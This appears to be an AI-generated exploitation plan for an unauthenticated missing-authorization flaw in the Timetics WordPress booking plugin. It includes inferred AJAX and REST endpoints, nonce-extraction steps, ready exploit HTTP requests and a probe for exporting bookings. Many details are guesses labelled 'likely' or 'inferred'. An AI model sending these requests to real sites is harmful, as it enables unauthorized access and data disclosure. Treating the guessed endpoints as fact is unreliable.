Exploitation Research Plan - CVE-2025-15473 (Timetics Plugin)

1. Vulnerability Summary

The Timetics – Appointment Booking Calendar & Scheduling System plugin (versions < 1.0.52) contains a "Missing Authorization" vulnerability. Specifically, a function (likely associated with deactivation feedback or integration handling) fails to perform a capability check (e.g., current_user_can( 'manage_options' )) or a nonce check, allowing unauthenticated attackers (PR:N) to perform actions meant for administrators. Given the provided source file assets/css/feedback-modal.css, the vulnerability is highly likely located in the deactivation feedback submission logic, which is often implemented as an AJAX handler.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php
• AJAX Action: timetics_deactivation_feedback or timetics_send_feedback (inferred from feedback-modal.css and the arraytics-wp-deactivation-feedback-modal dependency).
• Alternative Endpoint: A REST API route registered via Timetics\Base\Api subclasses.
• Authentication: Unauthenticated (PR:N).
• Payload Parameters:
  • action: timetics_deactivation_feedback
  • reason_id: (String/Int) The ID of the feedback reason.
  • reason_text: (String) Custom feedback text.
  • plugin_name: timetics (inferred from standard Arraytics integration).
• Preconditions: The plugin must be installed and active.

3. Code Flow

1. Entry Point: An unauthenticated HTTP POST request is sent to /wp-admin/admin-ajax.php.
2. Hook Registration: The plugin registers a handler for the AJAX action using add_action( 'wp_ajax_nopriv_timetics_deactivation_feedback', ... ) or fails to differentiate between wp_ajax_ and wp_ajax_nopriv_ in its registration logic.
3. Missing Check: The handler function executes. It fails to call current_user_can() to verify the requester is an administrator.
4. Action Execution: The function processes the feedback data, potentially sending it to a remote API or updating local options (e.g., dismissing a deactivation prompt).

4. Nonce Acquisition Strategy

If the endpoint requires a nonce, it is likely localized for use in the admin or on pages where the feedback modal is triggered.

1. Identify Shortcode: Search for shortcodes that might render the booking calendar (which often enqueues the plugin's main scripts): grep -r "add_shortcode" ..
2. Create Test Page:

   wp post create --post_type=page --post_title="Booking" --post_status=publish --post_content="[timetics-booking]"
   

3. Extract Nonce via Browser:
   • Navigate to the new page.
   • Use browser_eval to look for the localization object. In Timetics, this is often timetics_script_obj or timetics_params.
   • JS Command: browser_eval("window.timetics_script_obj?.nonce || window.timetics_params?.nonce")
4. Bypass Check: If check_ajax_referer is used with the default action -1, any valid nonce found on the page for any Timetics action may work.

5. Exploitation Strategy

Primary Exploit: Unauthorized Feedback Submission

1. HTTP Request:

   POST /wp-admin/admin-ajax.php HTTP/1.1
   Host: TARGET_HOST
   Content-Type: application/x-www-form-urlencoded
   
   action=timetics_deactivation_feedback&reason_id=other&reason_text=Exploit_Verification_CVE_2025_15473&plugin_name=timetics
   

2. Expected Response: A JSON success message like {"success":true} or 1.

Secondary Exploit (REST API):

Check if the base REST class Timetics\Base\Api has unprotected implementations.

1. HTTP Request:

   POST /wp-json/timetics/v1/feedback HTTP/1.1
   Host: TARGET_HOST
   Content-Type: application/json
   
   {
     "reason_id": "bug",
     "message": "Unauthenticated feedback"
   }
   

6. Test Data Setup

1. Install Timetics < 1.0.52.
2. Activate the plugin.
3. Create a public page with a Timetics shortcode to ensure all scripts and possible nonces are initialized:

   wp post create --post_type=page --post_status=publish --post_content='[timetics_appointment]'
   

7. Expected Results

• The server returns a 200 OK response with a body indicating success.
• No "403 Forbidden" or "Permissions Error" is returned despite the request being unauthenticated.
• If the plugin logs feedback internally (check wp_options), the injected feedback string should appear.

8. Verification Steps

1. Check for Nonce Check:

   grep -rn "check_ajax_referer" .
   

   If the function associated with timetics_deactivation_feedback does not appear in the results, the nonce check is missing.
2. Check for Capability Check:

   grep -rn "current_user_can" .
   

   Verify the AJAX handler function does not contain this call.
3. Check DB State: If the exploit triggers a state change (e.g., update_option), verify it via WP-CLI:

   wp option get timetics_feedback_sent
   

9. Alternative Approaches

• Integration Endpoint: base/custom-endpoint.php registers timetics-integration. Attempt to access this via /?timetics-integration=1 or /timetics-integration/ to see if any logic is triggered without authorization.
• CSV/JSON Exporter: Although CVSS says C:N, verify if Exporter::export_csv can be triggered via an AJAX action like timetics_export_bookings. If it returns data, it upgrades the vulnerability to an Information Disclosure.
  • Payload: action=timetics_export_bookings&format=csv
• Notice Dismissal: Search for actions like timetics_dismiss_notice which frequently lack authorization in similar plugins.